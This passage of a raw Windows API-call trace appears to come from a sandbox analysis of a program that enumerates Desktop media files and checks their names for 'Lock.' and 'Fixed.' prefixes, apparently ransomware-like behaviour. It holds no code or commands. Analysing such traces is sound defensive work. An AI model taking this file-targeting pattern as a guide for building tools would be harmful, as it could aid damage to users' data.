returned 0 [0190.007] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.008] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.008] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.008] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.009] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.009] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf0) returned 0x2416f30 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.010] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24202f0 [0190.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/UCS72GVnNBUxEzx.mkv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UCS72GVnNBUxEzx.mkv", lpFilePart=0x8bf658*="UCS72GVnNBUxEzx.mkv") returned 0x39 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0190.011] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UCS72GVnNBUxEzx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ucs72gvnnbuxezx.mkv")) returned 0xffffffff [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.011] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0190.011] TranslateMessage (lpMsg=0x8bf970) returned 0 [0190.011] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0190.011] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0190.011] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0190.011] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.011] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0190.011] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.011] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.012] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wI0b0QZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0b0QZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0b0QZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b0QZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0QZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZdP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dP-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.012] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KcsT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sT.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0190.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.013] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.013] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.013] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wI0b0QZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I0b0QZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0b0QZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b0QZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0QZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZdP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dP-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KcsT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0190.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sT.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0190.014] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.014] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0190.014] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.014] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.015] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.015] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.015] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0190.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.016] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.016] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.016] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/wI0b0QZdP-KcsT.avi", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea707560, ftCreationTime.dwHighDateTime=0x1d4c740, ftLastAccessTime.dwLowDateTime=0x69275000, ftLastAccessTime.dwHighDateTime=0x1d4ca9c, ftLastWriteTime.dwLowDateTime=0x69275000, ftLastWriteTime.dwHighDateTime=0x1d4ca9c, nFileSizeHigh=0x0, nFileSizeLow=0xd2af, dwReserved0=0xf7d0006, dwReserved1=0xfdc3, cFileName="wI0b0QZdP-KcsT.avi", cAlternateFileName="WI0B0Q~1.AVI")) returned 0xaa58a0 [0190.016] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0190.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.017] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0190.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0190.018] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 